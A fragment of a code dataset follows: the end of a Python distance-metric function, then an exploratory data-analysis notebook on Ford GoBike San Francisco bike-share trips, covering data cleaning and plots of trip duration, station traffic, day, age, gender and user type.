The values are strings\n\n # Handle the options matrix\n options = [[str(entry) for entry in row] for row in options]\n prmNameRow = [\"prm\" + str(idx) for idx in range(len(options[0]))]\n options.insert(0, prmNameRow)\n options = np.array(options)\n\n # Convert the itemToFind to a matrix with name row\n itemToFind = [str(entry) for entry in itemToFind]\n itemToFind = [prmNameRow, itemToFind]\n itemToFind = np.array(itemToFind)\n\n normalizeObject = Normalize(options, normalizeDataMatrix)\n optionsNormalized = normalizeObject.normalize()\n\n normalizeObject = Normalize(itemToFind, normalizeDataMatrix)\n itemNormalized = normalizeObject.normalize()\n\n bestDist = float(\"inf\")\n for optionIdx in range(len(optionsNormalized)):\n option = optionsNormalized.rows([optionIdx])\n dist = self.euclidean(option, itemNormalized)\n if dist < bestDist:\n selectedOption = optionIdx\n bestDist = dist\n\n return selectedOption\n","repo_name":"IlanHindy/AI-Learn","sub_path":"AI Project/Project/AI/Chapter3DistanceMetrics.py","file_name":"Chapter3DistanceMetrics.py","file_ext":"py","file_size_in_byte":4153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71675662641","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Dataset - (Ford GoBike System Data)\n# ## by (NWANAGU James Ifeanyichukwu)\n# \n# ## Introduction\n# > This data set includes information about individual rides made in a bike-sharing system covering the greater San Francisco\n# Bay area.\n# \n# \n# ## Preliminary Wrangling\n# > This data contains 183412 Data columns and a total of 16 columns\n\n# In[1]:\n\n\n# import all packages and set plots to be embedded inline\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sb\nimport calendar\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# In[2]:\n\n\n# load dataset into pandas\ngobike = pd.read_csv('201902-fordgobike-tripdata.csv')\n\n\n# In[3]:\n\n\n# Overview of data shape and information about the dataset\nprint(gobike.shape)\nprint(gobike.info())\n\n\n# In[4]:\n\n\n# view first five rows of the datasets\ngobike.head()\n\n\n# In[5]:\n\n\n# numerical statistics for the dataset\ngobike.describe()\n\n\n# In[6]:\n\n\n# checking how many rider have the minimum 61 seconds trip duration\ngobike[gobike['duration_sec'] == 61].count()\n\n\n# In[7]:\n\n\n# view 5 minimum duration\ngobike.nsmallest(5, 'duration_sec')\n\n\n# In[8]:\n\n\n# checking how many rider have the maximum 85444 seconds trip duration which is 23:73 hours\ngobike[gobike['duration_sec'] == 85444].count()\n\n\n# In[9]:\n\n\n# displaying the maximum trip duration\ngobike[gobike['duration_sec'] == 85444]\n\n\n# In[10]:\n\n\n# checking for unique values for user_type\ngobike.user_type.unique()\n\n\n# ## Observations\n\n# ### Tidiness Issues\n\n# 1. Age column is absent\n# 2. Month column is absent\n# 3. Day column is absent\n# 4. Time of the day absent\n# 4. The column 'duration_sec' is not conveyed in a clear manner\n# 5. Unwanted columns present in our dataset (start_station_latitude, start_station_longitude, end_station_latitude, end_station_longitude, bike_share_for_all_trip)\n\n# ### Quality Issues\n\n# 1. Missing data\n# 2. Erroneous data type (start_time, end_time, bike_id, user_type, start_station, end_station_id)\n# 3. 
Improper representation of values (start_station and end_station_id)\n\n# ## Cleaning Data\n\n# ### Create a copy of this dataset\n\n# In[11]:\n\n\nclean_gobike = gobike.copy()\n\n\n# ### Tidiness Issues\n# #### 1. Age column is absent\n\n# ##### Define\n# Create a new 'age' column from the existing 'member_birth_year' using the .apply(lambda) function, so that it is easy to call the age of rider instead of the year of birth. Ps: This data was collected since 2019, therefore our new age column will contain the age of riders in 2019\n\n# ##### Code\n\n# In[12]:\n\n\n# create a new age column for riders\nclean_gobike['age'] = clean_gobike['member_birth_year'].apply(lambda x: 2019 - x)\n\n\n# ##### Test\n\n# In[13]:\n\n\nclean_gobike['age'].describe()\n\n\n# #### 2. Month column is absent\n\n# ##### Define\n# Create a month column from the start_time column using the apply(lambda) function. First we are going to convert the data type of start_time amd end_time to 'datetime'\n\n# ##### Code\n\n# In[14]:\n\n\n# convert start_time and end_time variable to datetime\n# extract month of the year\nclean_gobike[['start_time', 'end_time']] = clean_gobike[['start_time', 'end_time']].apply(pd.to_datetime)\nclean_gobike['start_month'] = clean_gobike['start_time'].apply(lambda time: time.month)\nclean_gobike['start_month'] = clean_gobike['start_month'].apply(lambda x: calendar.month_abbr[x])\n# The start_month column extracted from start_time has just one unique value (Feb)\n\n\n# In[15]:\n\n\nclean_gobike.start_month.unique()\n\n\n# ##### Test\n\n# In[16]:\n\n\nprint(clean_gobike['start_month'].value_counts())\n\n\n# #### 3. Day column is absent\n\n# ##### Define\n# Create day columns from the start_time and end_time columns using the pandas.Series.dt.day_name function\n\n# ##### Code\n\n# In[17]:\n\n\n# create start_day and end_day column\nclean_gobike.insert(2, 'start_day', clean_gobike['start_time'].dt.day_name(), True)\nclean_gobike.insert(4, 'end_day', clean_gobike['end_time'].dt.day_name(), True)\n\n\n# ##### Test\n\n# In[18]:\n\n\nprint(clean_gobike['start_day'].head(5))\nprint(clean_gobike['end_day'].head(5))\n\n\n# #### 4. Time of the day absent\n\n# ##### Define\n# Create time of the day column from the start_time column using the apply(lambda) function. \n\n# ##### Code\n\n# In[19]:\n\n\n# create time of the day column\nclean_gobike['period'] = clean_gobike['start_time'].apply(lambda time: time.hour)\nclean_gobike['day_period'] = 'morning'\nclean_gobike['day_period'][(clean_gobike['period'] >= 12) & (clean_gobike['period'] <= 17)] = 'afternoon'\nclean_gobike['day_period'][(clean_gobike['period'] >= 18) & (clean_gobike['period'] <= 23)] = 'night'\n\n\n# ##### Test\n\n# In[20]:\n\n\nprint(clean_gobike['period'].head(5))\nprint(clean_gobike['day_period'].head(5))\n\n\n# #### 5. The column 'duration_sec' is not conveyed in a clear manner\n\n# ##### Define\n# Convey the duration_sec column in a more clear manner by creating two extra columns (duration_mins and duration_hour)\n\n# ##### Code\n\n# In[21]:\n\n\n# Create additional duration columns and round the values to 2 decimal points\nclean_gobike.insert(1, 'duration_mins', clean_gobike['duration_sec']/60, True)\nclean_gobike['duration_mins'] = round(clean_gobike['duration_mins'], 2)\n\n\n# ##### Test\n\n# In[22]:\n\n\nprint(clean_gobike['duration_mins'].head(5))\n\n\n# #### 6. 
Unwanted columns present in our dataset \n\n# ##### Define\n# Drop columns that will not be needed in this analysis\n\n# ##### Code\n\n# In[23]:\n\n\n# drop unwanted columns\nclean_gobike.drop(['duration_sec', 'start_station_latitude', 'start_station_longitude', 'end_station_latitude', 'end_station_longitude', 'bike_share_for_all_trip', 'member_birth_year', 'start_month', 'period'], axis = 1, inplace = True)\n\n\n# ##### Test\n\n# In[24]:\n\n\nclean_gobike.info()\n\n\n# ### Quality Issues\n\n# #### 1. Missing data\n\n# ##### Define\n# Drop missing values on our dataset\n\n# ##### Code\n\n# In[25]:\n\n\n# drop rows with missing data\nclean_gobike.dropna(inplace = True)\n\n\n# ##### Test\n\n# In[26]:\n\n\nprint(clean_gobike.isnull().sum().any())\nclean_gobike.shape\n\n\n# #### 2. Erroneous data type\n\n# ##### Define\n# Convert datatypes into a more useful type for our analysis eg: bike_id, age, start_station_id, end_station_id, start_day, end_day, day_period should be converted into a more appropriate and useful type.\n\n# ##### Code\n\n# In[27]:\n\n\n# convert data type\nclean_gobike[['bike_id', 'start_station_id', 'end_station_id']] = clean_gobike[['bike_id', 'start_station_id', 'end_station_id']].astype(str)\nclean_gobike['age'] = clean_gobike['age'].astype(int)\nvariables = {'start_day': ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday'], \n 'end_day': ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday'], \n 'day_period': ['morning', 'afternoon', 'night']}\nfor var in variables:\n order_var = pd.api.types.CategoricalDtype(ordered = True, categories = variables[var])\n clean_gobike[var] = clean_gobike[var].astype(order_var)\n\n\n# ##### Test\n\n# In[28]:\n\n\nclean_gobike.dtypes\n\n\n# #### 3. Improper representation of values\n\n# ##### Define\n# Slice the '.0' attached to the start_station_id and end_station_id values\n\n# ##### Code\n\n# In[29]:\n\n\nclean_gobike['start_station_id'] = clean_gobike.start_station_id.str[:-2]\nclean_gobike['end_station_id'] = clean_gobike.end_station_id.str[:-2]\n\n\n# ##### Test\n\n# In[30]:\n\n\nclean_gobike[['start_station_id', \"end_station_id\"]].head(2)\n\n\n# ### What is the structure of your dataset?\n# \n# > There are 174952 data in the dataset and 14 columns. The start_day, end_day and day_period are all ordered variables.\n# \n# ### What is/are the main feature(s) of interest in your dataset?\n# \n# > I am interested in finding out when and where do riders make the most trip. \n# > What characteristics (age, user_type, gender) influence when riders chose to make those trips. \n# \n# ### What features in the dataset do you think will help support your investigation into your feature(s) of interest?\n# \n# > I expect time of ride variables and station variables to have a significant effect in the number of rides. Riders during the day especially morning, should be much more than riders during afternoon and night time. Also, stations located in a more urbanized location will tend to have more trips than stations located in a less urbanized area, but these assumptions will need more clarification with our analysis. Subscribers are also expected to have more number of rides than customers too because i believe they will be of top priority to the company and their rides will come with bonuses. I assume age, and sex of riders will have significant effect too, as enegetic younger riders, and male riders would tend to have more rides than older riders and female riders respectively. 
These assumptions will be a subject of our analysis.\n\n# ## Univariate Exploration\n\n# ##### At what time duration did most riders complete their trips?\n\n# In[31]:\n\n\n# numerical statistics for duration\nclean_gobike.duration_mins.describe()\n\n\n# In[32]:\n\n\n# distribution of duration of trips\nbins = np.arange(1, clean_gobike['duration_mins'].max()+100, 100)\nplt.hist(data = clean_gobike, x = 'duration_mins', bins = bins, facecolor = 'g')\nplt.title(\"Distribution of rider's trip duration in minutes\")\nplt.xlabel('Duration (mins)')\nplt.ylabel('Number of trips');\n\n\n# In[33]:\n\n\n# log type numerical statistics for duration\nnp.log10(clean_gobike.duration_mins.describe())\n\n\n# In[34]:\n\n\n# distribution of duration of trips using log transformation\nplt.figure(figsize = (15, 5))\nbins = 10 ** np.arange(0.008, 3.2+0.05, 0.05)\nplt.hist(data = clean_gobike, x = 'duration_mins', bins = bins, facecolor = 'g', rwidth = .7)\nticker = [0, 1, 2, 3, 4, 6, 8, 12, 20, 30, 40, 80]\nlabel = ['{}'.format(v) for v in ticker]\nplt.xscale('log')\nplt.xticks(ticker, label)\nplt.xlim((0.8, 80))\nplt.title(\"Distribution of rider's trip duration in minutes (x-axis limits are changed and scaled to log type)\")\nplt.xlabel('Duration (mins)')\nplt.ylabel('Number of trips');\n\n\n# Most trips were completed between 5 to 13 minutes.\n\n# ##### What station gained the most traffic?\n\n# In[35]:\n\n\n# number of stations present in our data set and their frequency\nnum = clean_gobike['start_station_name'].value_counts().count()\nprint('\\033[32mThere are {} stations present in our dataset\\n'.format(num))\nclean_gobike['start_station_name'].value_counts()\n\n\n# In[36]:\n\n\n# create a subset of first 10 station names with highest frequency\nstation = ['Market St at 10th St', 'San Francisco Caltrain Station 2 (Townsend St at 4th St)', 'Berry St at 4th St', 'Montgomery St BART Station (Market St at 2nd St)', \n 'Powell St BART Station (Market St at 4th St)', 'San Francisco Caltrain (Townsend St at 4th St)', 'San Francisco Ferry Building (Harry Bridges Plaza)', \n 'Howard St at Beale St', 'Steuart St at Market St', 'Powell St BART Station (Market St at 5th St)']\ngobike10 = clean_gobike.loc[clean_gobike['start_station_name'].isin(station)]\n\n\n# In[37]:\n\n\n# number of start stations present in our subset data set and their frequency\nnum = gobike10['start_station_name'].value_counts().count()\nprint('\\033[32mThere are {} start stations present in our dataset\\n'.format(num))\ngobike10['start_station_name'].value_counts()\n\n\n# In[38]:\n\n\n# create a countplot for top 10 stations\nordr = gobike10.start_station_name.value_counts().index\nplt.figure(figsize = (15, 8))\ncolour = sb.color_palette()[2]\nsb.countplot(data = gobike10, y = 'start_station_name', color = colour, order = ordr)\nplt.title('Top 10 stations with most trip')\nplt.ylabel('Stations name');\n\n\n# Market St at 10th St station has the most trips. From [Google Map](https://www.google.com/maps/search/tourist+places/@37.7765395,-122.426281,15z/data=!3m1!4b1!4m8!2m7!3m6!1stourist+places!2sMarket+St+%26+10th+St,+San+Francisco,+CA+94102,+USA!3s0x8085809c174aa0c9:0x17bf51f6fa75b155!4m2!1d-122.4175262!2d37.7765399), this could be as a result of the station being located around Tourist sites and business hubs. Also present are a number of train stations. The second busiest station is San Francisco Caltrain Station 2 (Townsend St at 4th St). 
Tourist sites and business hubs could also a reason for it busy nature.\n\n# ##### With regards to our top 10 station, at what time duration did most riders complete their trips\n\n# In[39]:\n\n\n# log type numerical statistics for duration\nnp.log10(gobike10.duration_mins.describe())\n\n\n# In[40]:\n\n\n# lets plot the distribution of duration of trips for our top 10 stations with huge traffic using log transformation\nplt.figure(figsize = (15, 5))\nbins = 10 ** np.arange(0.008, 3.2+0.05, 0.05)\nplt.hist(data = gobike10, x = 'duration_mins', bins = bins, facecolor = 'g', rwidth = .7)\nticker = [0, 1, 2, 3, 4, 6, 8, 12, 20, 30, 40, 80]\nlabel = ['{}'.format(v) for v in ticker]\nplt.xscale('log')\nplt.xticks(ticker, label)\nplt.xlim((2, 40))\nplt.title(\"Distribution of rider's trip duration in minutes in top 10 stations (x-axis limits are changed and scaled to log type)\")\nplt.xlabel('Duration (mins)')\nplt.ylabel('Number of trips');\n\n\n# Most of the trip are completed at an average duration of 8 to 12 minutes. This sort of correspond with our earlier plot of duration distribution for our over all dataset\n\n# ##### What is the age range for most riders?\n\n# In[41]:\n\n\n# numerical statistics for age\ngobike10.age.describe()\n\n\n# In[42]:\n\n\n# age distribution in top 10 stations\nplt.figure(figsize = (7, 5))\nbins = np.arange(10, gobike10.age.max()+2, 2)\nplt.hist(data = gobike10, x = 'age', bins = bins, facecolor = 'g', rwidth = 0.8)\nplt.xlabel('Age distribution')\nplt.ylabel('Number of trips');\n\n# from our plot, we can see that our data is skewed to the right. This shows a need for our axis transformation\n\n\n# In[43]:\n\n\nnp.log10(gobike10.age.describe())\n\n\n# In[44]:\n\n\n# age distribution in top 10 station using log scale for the x-axis transformation\nplt.figure(figsize = (15, 5))\nbins = 10 ** np.arange(1.2, 2.2+0.02, 0.02)\nplt.hist(data = gobike10, x = 'age', bins = bins, facecolor = 'g', rwidth = 0.8)\nplt.xscale('log')\nticker = [15, 20, 30, 40, 60, 80, 100, 150]\nplt.xticks(ticker, ticker)\nplt.title('Age Distribution in top 10 stations (x-axis scaled to log type)')\nplt.xlabel('Age')\nplt.ylabel('Number of trips');\n\n\n# From our plot, most trips in the top 10 stations are completed by persons around age 30. It appears there are persons of age 100 and above which i believe are outliers.\n\n# ##### What day do riders prefer most?\n\n# In[45]:\n\n\nprint(gobike10['start_day'].describe())\ngobike10['end_day'].describe()\n\n\n# In[46]:\n\n\nprint(gobike10['start_day'].value_counts())\ngobike10['end_day'].value_counts()\n\n\n# In[47]:\n\n\n# distribution of riders at a particular time\nplt.figure(figsize = (20, 5))\nplt.suptitle('Number of Weekly Rides in Top 10 Stations')\nplt.subplot(1, 2, 1)\ncolour = sb.color_palette()[2]\nsb.countplot(data = gobike10, x = 'start_day', color = colour)\nplt.xlabel('Start Days of the Week')\nplt.ylabel('Number of trips')\n\nplt.subplot(1, 2, 2)\nsb.countplot(data = gobike10, x = 'end_day', color = colour)\nplt.xlabel('End Days of the Week')\nplt.ylabel('Number of trips');\n\n\n# Weekdays appears to have more riders than weekends with Thursday and Tuesday having the highest number of rides. Monday have the least ride for the weekdays. What could be the reasons behind this? \n\n# ##### What time of the day do most riders prefer? 
\n\n# In[48]:\n\n\ngobike10.day_period.describe()\n\n\n# In[49]:\n\n\ngobike10.day_period.value_counts()\n\n\n# In[50]:\n\n\n# time of the day distribution in top 10 stations\nplt.figure(figsize = (10, 5))\nsb.countplot(data = gobike10, x = 'day_period', color = colour)\nplt.title('Number of Rides for each Time of the Day')\nplt.xlabel('Time of day')\nplt.ylabel('Number of trips');\n\n\n# From our plot, riders make the most trip during the morning and afternoon hours. This could be as a result of working hours duration. Night appears to be the period for least trip. \n\n# ##### What gender and user type make the most trip?\n\n# In[51]:\n\n\nprint(gobike10.member_gender.value_counts())\nprint(gobike10.user_type.value_counts())\n\n\n# In[52]:\n\n\n# plot distribution of gender and user type\nfig, ax = plt.subplots(nrows = 2, figsize = [10, 10])\nsb.countplot(data = gobike10, x = 'member_gender', color = colour, ax = ax[0])\nsb.countplot(data = gobike10, x = 'user_type', color = colour, ax = ax[1])\nax[0].set_title('Number of Trips by Gender')\nax[0].set_xlabel('Gender')\nax[0].set_ylabel('Number of trips')\nax[1].set_title('Number of Trips by User Type')\nax[1].set_xlabel('User type')\nax[1].set_ylabel('Number of trips');\n\n\n# > 1. From our plot, male have the most trip than female, while 'other' have the least ride. What reasons could be behind male riders getting more rides than women rider? \"Other\" variable could be as a result of riders that neither identify as male or female.\n# > 2. From our user type plot, suscribers tend to have the most trip than customers. This could be as a result of greater priority which the company have for subscribers than customers.\n\n# ### Discuss the distribution(s) of your variable(s) of interest. Were there any unusual points? Did you need to perform any transformations?\n# \n# > After performing cleaning operation on our dataset, we had 174952 data with 14 columns.\n# > To avoid over plotting, I created a subset of top 10 stations location with highest ride frequendy to lowest ride frequency that I will be working with. They include;\n# > 1. 'Market St at 10th St', \n# > 2. 'San Francisco Caltrain Station 2 (Townsend St at 4th St)', \n# > 3. 'Berry St at 4th St', \n# > 4. 'Montgomery St BART Station (Market St at 2nd St)', \n# > 5. 'Powell St BART Station (Market St at 4th St)', \n# > 6. 'San Francisco Caltrain (Townsend St at 4th St)', \n# > 7. 'San Francisco Ferry Building (Harry Bridges Plaza)', \n# > 8. 'Howard St at Beale St', \n# > 9. 'Steuart St at Market St', \n# > 10. 'Powell St BART Station (Market St at 5th St)'\n# \n# > The duration for complete trip and age were skewed to the right. To correct this, i performed a log transformation on these variables and found out that most trips were completed in 8 to 12 minutes range, while the average age of most riders was around 30. Weekdays tend to be the favourite days for riders with Thursday and Tuesday having the most trips, while mondays have least trips for weekdays. This needs to be investigated further. Riders make the most trip during the morning and afternoon hours of the day. This should be as a result of working hours duration. Night appears to be the period with least rides. For Users, males have the most trip than female and other. Subcribers tend to have the most trip than customers.\n# \n# ### Of the features you investigated, were there any unusual distributions? Did you perform any operations on the data to tidy, adjust, or change the form of the data? 
If so, why did you do this?\n# \n# > There were 183412 data present in the dataset with 16 columns. The dataset was a bit dirty and messy. \n# > 1. There was year of birth present instead of age. I performed a lambda arithmetic operation on the column series and created a new age column for the dataset. \n# > 2. From the start time column, I extracted the month, Day of the weeks, and time of the day into different columns. \n# > 3. The month extracted from start time column happens to be February. \n# > 4. The time duration for a complete ride was presented in seconds which was not clear enough. The least time duration was 61 seconds which is a 1.1minutes duration. I converted the duration to minutes which is a proper representation of seconds.\n# > 5. Columns that we will not be working with for our analysis were discarded including the month column\n# > 6. There were some missing data in our datasets too. The rows containing these missing data were dropped.\n# > 7. Erroneous data type was addressed too.\n\n# ## Bivariate Exploration\n\n# In[53]:\n\n\n# correlation matrices for numerical variables \nsb.heatmap(gobike10.corr(), annot = True, fmt = '.2f', cmap = 'rocket_r', center = 0)\nplt.title('Correlation Matrices for Numerical Variables');\n\n\n# In[54]:\n\n\n# relationship between duration and age\nsb.regplot(data = gobike10, x = 'age', y = 'duration_mins', fit_reg = False, scatter_kws = {'alpha': 1/2});\n\n\n# In[55]:\n\n\ndef log_trans(x, inverse = False):\n \"\"\" Transformation Helper Function \"\"\"\n if not inverse:\n return np.log10(x)\n else:\n return np.power(10, x)\n\n\n# In[56]:\n\n\n# log transformation for both age and duration\nplt.figure(figsize = (7, 5))\ngobike10['log_age'] = gobike10['age'].apply(log_trans)\nsb.regplot(data = gobike10, x = 'log_age', y = 'duration_mins', fit_reg = False, scatter_kws = {'alpha': 1/500})\nplt.yscale('log')\nxtick = [15, 20, 30, 40, 60, 80, 100, 150]\nlabel = ['{}'.format(v) for v in xtick]\nplt.xticks(log_trans(xtick), label)\nytick = [0.08, 0.2, 0.5, 1, 2, 4, 8, 16, 30, 50, 90, 200]\nplt.yticks(ytick, ytick)\nplt.title('Relationship between Duration and Age')\nplt.xlabel('Age')\nplt.ylabel('Duration (mins)');\n\n\n# From the correlation matrices for numerical variables, age and duration have a slight negative correlation. Most riders were around age greater than 20 and less than 40. this put it at an average of around 30 years. The time duration for this age was around 10 minutes.\n\n# In[57]:\n\n\n# plot for station and age\nplt.figure(figsize = (10, 5))\nsb.violinplot(data = gobike10, x = 'age', y = 'start_station_name', color = colour, inner = 'quartile', order = ordr)\nplt.xscale('log')\nxticker = [15, 20, 30, 40, 60, 80, 100, 150]\nlabel = ['{}'.format(v) for v in xticker]\nplt.xticks(xticker, label)\nplt.title('Relationship between Station and Age')\nplt.xlabel('Age')\nplt.ylabel('Station names');\n\n\n# Age have a median of around 30 years for all top 10 station location. This further shows that the majority of riders around workable age of 30.\n\n# In[58]:\n\n\n# plot for station and duration\nplt.figure(figsize = (10, 5))\nsb.boxplot(data = gobike10, x = 'duration_mins', y = 'start_station_name', color = colour, order = ordr)\nplt.xscale('log')\nplt.xlabel('Duration (mins)');\nticker = [0.08, 5, 10, 20, 100, 1000]\nplt.xticks(ticker, ticker)\nplt.title('Relationship between Station and Duration')\nplt.ylabel('Station names');\n\n\n# Duration have a median of around 10 minutes for all top 10 station location. 
This corresponds to our earlier plot on the duration of riders.\n\n# In[59]:\n\n\n# relationship between station and day of the week\nplt.figure(figsize = (10, 10))\n\nplt.subplot(2, 1, 1)\ncat_count = gobike10.groupby(['start_station_name', 'start_day']).size()\ncat_count = cat_count.reset_index(name = 'count').pivot(index = 'start_station_name', columns = 'start_day', values = 'count')\nsb.heatmap(cat_count, annot = True, fmt = '.1f')\nplt.title('HeatMap showing Relationship between Station and Day of the Week')\nplt.xlabel('Day of the week')\nplt.ylabel('Station names')\n\nplt.subplot(2, 1, 2)\nsb.countplot(data = gobike10, y = 'start_station_name', hue = 'start_day', order = ordr)\nplt.legend(bbox_to_anchor = (1, 1))\nplt.legend(bbox_to_anchor = (1, 1), title = 'Day of the week')\nplt.title('Plot showing Relationship between Station and Day of the Week')\nplt.ylabel('Station names');\n\n\n# In all 10 locations, weekdays have most rides than weekends. Among the weekdays, thursday and tuesday have the most trips, while monday have the least trip. What could be the reason behind this? Unlike the former distribution of station plot that made Market St at 10th St the station with the most rides, this plot gives a better insight. San Francisco Caltrain Station 2 (Townsend St at 4th St) and Market St at 10th St have the most ride for weekdays, but Market St at 10th St have most rides for weekends as well as Powell St BART Station (Market St at 4th St). \n\n# In[60]:\n\n\n# relationship between station and time of the day\nplt.figure(figsize = (10, 10))\n\nplt.subplot(2, 1, 1)\ncat_count = gobike10.groupby(['start_station_name', 'day_period']).size()\ncat_count = cat_count.reset_index(name = 'count').pivot(index = 'start_station_name', columns = 'day_period', values = 'count')\nsb.heatmap(cat_count, annot = True, fmt = '.1f');\nplt.title('HeatMap showing Relationship between Station and Time of the Day')\nplt.xlabel('Time of the day')\nplt.ylabel('Station names')\n\nplt.subplot(2, 1, 2)\nsb.countplot(data = gobike10, y = 'start_station_name', hue = 'day_period', order = ordr)\nplt.legend(bbox_to_anchor = (1, 1), title = 'Time of the day')\nplt.title('Plot showing Relationship between Station and Time of the Day')\nplt.ylabel('Station names');\n\n\n# Morning and Afternoon have the most ride for the top 10 stations. San Francisco Caltrain Station 2 (Townsend St at 4th St) have the most ride for morning. This is different for Market St at 10th St that have almost equal rides for both afternoon and morning period.\n\n# In[61]:\n\n\n# relationship between station and gender\nplt.figure(figsize=(10,6))\nsb.countplot(data = gobike10, y = 'start_station_name', hue = 'member_gender', order = ordr)\nplt.legend(bbox_to_anchor = (1, 1), title = 'Gender')\nplt.title('Plot showing Relationship between Station and Gender')\nplt.ylabel('Station names');\n\n\n# Across all top 10 station, male have most rides than female. From our earlier plot on the distribution of gender, we still haven't figured out why the male gender are more than the female.\n\n# In[62]:\n\n\n# relationship between station and user type\nplt.figure(figsize=(10,6))\nsb.countplot(data = gobike10, y = 'start_station_name', hue = 'user_type', order = ordr)\nplt.legend(bbox_to_anchor = (1, 1), title = 'User type')\nplt.title('Plot showing Relationship between Station and User Type')\nplt.ylabel('Station names');\n\n\n# Subscribers tends to have more rides than customers. 
Market St at 10th St have the most suscribers.\n\n# In[63]:\n\n\n# relationship plot between time and age\nplt.figure(figsize = (20, 6))\nplt.suptitle('Plot showing Relationship between Time and Age')\n\nplt.subplot(1, 2, 1)\nsb.violinplot(data = gobike10, x = 'age', y = 'start_day', color = colour, inner = 'quartile')\nplt.xscale('log')\nxticker = [15, 20, 30, 40, 60, 80, 100, 150]\nlabel = ['{}'.format(v) for v in xticker]\nplt.xticks(xticker, label)\nplt.title('Day of the week and Age')\nplt.ylabel('Day of the week')\nplt.xlabel('Age');\n\nplt.subplot(1, 2, 2)\nsb.violinplot(data = gobike10, x = 'age', y = 'day_period', color = colour, inner = 'quartile')\nplt.xscale('log')\nxticker = [15, 20, 30, 40, 60, 80, 100, 150]\nlabel = ['{}'.format(v) for v in xticker]\nplt.xticks(xticker, label)\nplt.title('Time of the Day and Age')\nplt.ylabel('Time of the day')\nplt.xlabel('Age');\n\n\n# The median age for most riders during the weekdays are slightly higher than those of weekends, but they are still around the range of 30. This shows that more younger people ride during the weekends. This further proves the age of most riders to be around 30. \n\n# In[64]:\n\n\n# plot of user type against time\nplt.figure(figsize = (20, 6))\nplt.suptitle('Plot showing Relationship between Time and User Type')\n\nplt.subplot(1, 2, 1)\nsb.countplot(data = gobike10, y = 'start_day', hue = 'user_type')\nplt.legend(bbox_to_anchor = (1, 1), title = 'User type')\nplt.title('Day of the week and User Type')\nplt.ylabel('Day of the week');\n\nplt.subplot(1, 2, 2)\nsb.countplot(data = gobike10, y = 'day_period', hue = 'user_type')\nplt.legend(bbox_to_anchor = (1, 1), title = 'User type')\nplt.title('Time of the Day and User Type')\nplt.ylabel('Time of the day');\n\n\n# Subcribers tend to ride mostly on thursday and tuesdays. what is happening on thurdays and tuesdays? We need to investigate further. Morning hours also have the most ride for subscribers, while afternoon hours have most ride for customers. \n\n# In[65]:\n\n\n# plot of gender and time\nplt.figure(figsize = (22, 6))\nplt.suptitle('Plot showing Relationship between Time and Gender')\n\nplt.subplot(1, 2, 1)\nsb.countplot(data = gobike10, y = 'start_day', hue = 'member_gender')\nplt.legend(bbox_to_anchor = (1, 1), title = 'Gender')\nplt.title('Day of the week and Gender')\nplt.ylabel('Day of the week');\n\nplt.subplot(1, 2, 2)\nsb.countplot(data = gobike10, y = 'day_period', hue = 'member_gender')\nplt.legend(bbox_to_anchor = (1, 1), title = 'Gender')\nplt.title('Time of the day and Gender')\nplt.ylabel('Time of the day');\n\n\n# This also confirms earlier plot that male have more rides than females and others and they have most rides in the morning hours.\n\n# In[66]:\n\n\n# plot between time and duration\nplt.figure(figsize = (20, 6))\nplt.suptitle('Plot showing Relationship between Time and Duration')\n\nplt.subplot(1, 2, 1)\nsb.boxplot(data = gobike10, x = 'duration_mins', y = 'start_day', color = colour)\nplt.xscale('log')\nticker = [0.08, 10, 100, 1000]\nplt.xticks(ticker, ticker)\nplt.title('Day of the week and Duration')\nplt.ylabel('Day of the week')\nplt.xlabel('Duration (mins)');\n\nplt.subplot(1, 2, 2)\nsb.boxplot(data = gobike10, x = 'duration_mins', y = 'day_period', color = colour)\nplt.xscale('log')\nticker = [0.08, 10, 100, 1000]\nplt.xticks(ticker, ticker);\nplt.title('Time of the day and Duration')\nplt.ylabel('Time of the day')\nplt.xlabel('Duration (mins)');\n\n\n# From our plot, weekends have the longest duration of rides than weekdays. 
Afternoon and night also have longer duration of rides than morning\n\n# ### Talk about some of the relationships you observed in this part of the investigation. How did the feature(s) of interest vary with other features in the dataset?\n# \n# > Age of riders for the Top 10 stations have a median of around 30. This further shows that the majority of riders are around workable age of 30.\n# \n# > Duration have a median of around 10 minutes for all top 10 station location. This corresponds to our earlier plot on the duration of riders\n# \n# > In all 10 locations, weekdays have most rides than weekends. Among the weekdays, thursday and tuesday have the most trips, while monday have the least trip. Unlike the former distribution of station plot that made Market St at 10th St the station with the most rides, this plot gives a better insight. San Francisco Caltrain Station 2 (Townsend St at 4th St) and Market St at 10th St have the most ride for weekdays, especially thursdays and tuesdays, but Market St at 10th St have most rides for weekends which i believe could be as a result of tourist presence. This could suggest that Market St at 10th St have much more attractive sites than San Francisco Caltrain Station 2 (Townsend St at 4th St).\n# \n# > Morning and Afternoon have the most ride for the top 10 stations. San Francisco Caltrain Station 2 (Townsend St at 4th St) have the most ride for morning. This is different for Market St at 10th St that have almost equal rides for both afternoon and morning period. This further strengthens our assumption on Market St at 10th St been made up of employees and tourists.\n# \n# > Male have most rides than female. \n# \n# > Subscribers tends to have more rides than customers. Market St at 10th St have the most suscribers.\n# \n# > The median age for most riders during the weekdays are slightly higher than those of weekends, but they are still around the range of 30. This shows that more younger people ride during the weekends. This further proves the age of most riders to be around 30.\n# \n# > Subcribers tend to ride mostly on thursday and tuesdays. what is happening on thurdays and tuesdays? We need to investigate further. Morning hours also have the most ride for subscribers, while afternoon hours have most ride for customers.\n# \n# > Male have more rides than females and others and they have most rides in the morning hours.\n# \n# > Weekends have the longest duration of rides than weekdays. Afternoon and night also have longer duration of rides than morning\n# \n# ### Did you observe any interesting relationships between the other features (not the main feature(s) of interest)?\n# \n# > There was a negative relationship between age and duration. 
